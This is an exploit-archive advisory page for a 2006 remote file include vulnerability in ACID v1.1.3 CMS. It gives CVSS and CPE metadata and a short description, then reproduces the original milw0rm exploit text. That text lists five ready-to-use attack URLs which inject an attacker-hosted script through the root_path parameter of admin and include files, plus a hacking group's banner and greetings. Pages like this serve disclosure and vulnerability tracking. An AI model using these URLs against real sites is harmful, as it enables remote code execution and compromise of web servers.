ACID v1.1.3 CMS (root_path) - Remote File Include Vulnerabilities

vendor:

ACID CMS

by:

Kacper (Rahim)

8.3

CVSS

HIGH

Remote File Include

CWE

Product Name: ACID CMS

Affected Version From: 1.1.2003

Affected Version To: 1.1.2003

Patch Exists: YES

Related CWE: N/A

CPE: a:acidcms:acid:1.1.3

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

ACID v1.1.3 CMS (root_path) – Remote File Include Vulnerabilities

ACID v1.1.3 CMS is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code within the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.

Source

Exploit-DB raw data:

################ DEVIL TEAM THE BEST POLISH TEAM #################
#
# ACID v1.1.3 CMS (root_path) - Remote File Include Vulnerabilities
# Script site: http://herve.labas.free.fr/acid/en/
# Find by Kacper (Rahim).
# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko, pepi
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Special greetz DragonHeart :***
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
#
##################################################################


http://www.site.com/[ACID_path]/admin/menu.php?root_path=[evil_scripts]
http://www.site.com/[ACID_path]/admin/profile.php?root_path=[evil_scripts]
http://www.site.com/[ACID_path]/admin/users.php?root_path=[evil_scripts]
http://www.site.com/[ACID_path]/includes/cache_mngt.php?root_path=[evil_scripts]
http://www.site.com/[ACID_path]/includes/gallery_functions.php?root_path=[evil_scripts]

# milw0rm.com [2006-06-01]